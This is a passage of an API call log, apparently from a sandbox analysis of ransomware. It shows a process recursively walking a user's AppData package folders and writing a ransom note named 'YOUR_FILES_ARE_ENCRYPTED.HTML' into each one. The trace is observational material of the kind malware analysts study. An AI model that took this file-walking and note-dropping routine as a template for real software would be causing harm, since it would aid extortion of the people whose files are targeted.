cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0117.079] GetProcessHeap () returned 0x600000 [0117.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.080] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.081] CloseHandle (hObject=0x320) returned 1 [0117.081] GetProcessHeap () returned 0x600000 [0117.081] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.081] GetProcessHeap () returned 0x600000 [0117.081] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.081] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0117.081] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0117.081] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0117.081] GetProcessHeap () returned 0x600000 [0117.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0117.081] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0117.082] CloseHandle (hObject=0x31c) returned 1 [0117.082] GetProcessHeap () returned 0x600000 [0117.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.082] GetProcessHeap () returned 0x600000 [0117.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.083] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dcf9475, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.People_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PEO")) returned 1 [0117.083] StrStrIW (lpFirst="Microsoft.People_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.083] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe") returned 79 [0117.083] GetProcessHeap () returned 0x600000 [0117.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0117.084] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe" [0117.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\*" [0117.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.110] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0117.110] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dcf9475, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd456e8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0117.110] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.110] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC") returned 82 [0117.110] GetProcessHeap () returned 0x600000 [0117.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.111] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC" [0117.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\*" [0117.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dcf9475, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd456e8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0117.268] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dcf9475, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dcf9475, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd456e8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.269] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0117.269] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.269] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache") returned 92 [0117.269] GetProcessHeap () returned 0x600000 [0117.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.270] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache" [0117.270] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache\\*" [0117.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.270] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.270] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.270] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.270] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0117.271] GetProcessHeap () returned 0x600000 [0117.271] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.272] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.273] CloseHandle (hObject=0x214) returned 1 [0117.273] GetProcessHeap () returned 0x600000 [0117.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.273] GetProcessHeap () returned 0x600000 [0117.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.273] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0117.273] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.273] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies") returned 94 [0117.273] GetProcessHeap () returned 0x600000 [0117.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.273] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies" [0117.273] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0117.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626978 [0117.273] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.273] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.273] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0117.273] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0117.274] GetProcessHeap () returned 0x600000 [0117.274] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.274] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.275] CloseHandle (hObject=0x214) returned 1 [0117.275] GetProcessHeap () returned 0x600000 [0117.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.275] GetProcessHeap () returned 0x600000 [0117.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.275] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0117.275] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.275] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory") returned 94 [0117.275] GetProcessHeap () returned 0x600000 [0117.275] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.275] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory" [0117.276] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0117.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626978 [0117.276] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.276] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.276] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0117.276] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0117.277] GetProcessHeap () returned 0x600000 [0117.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.277] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.278] CloseHandle (hObject=0x214) returned 1 [0117.278] GetProcessHeap () returned 0x600000 [0117.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.278] GetProcessHeap () returned 0x600000 [0117.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.278] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, 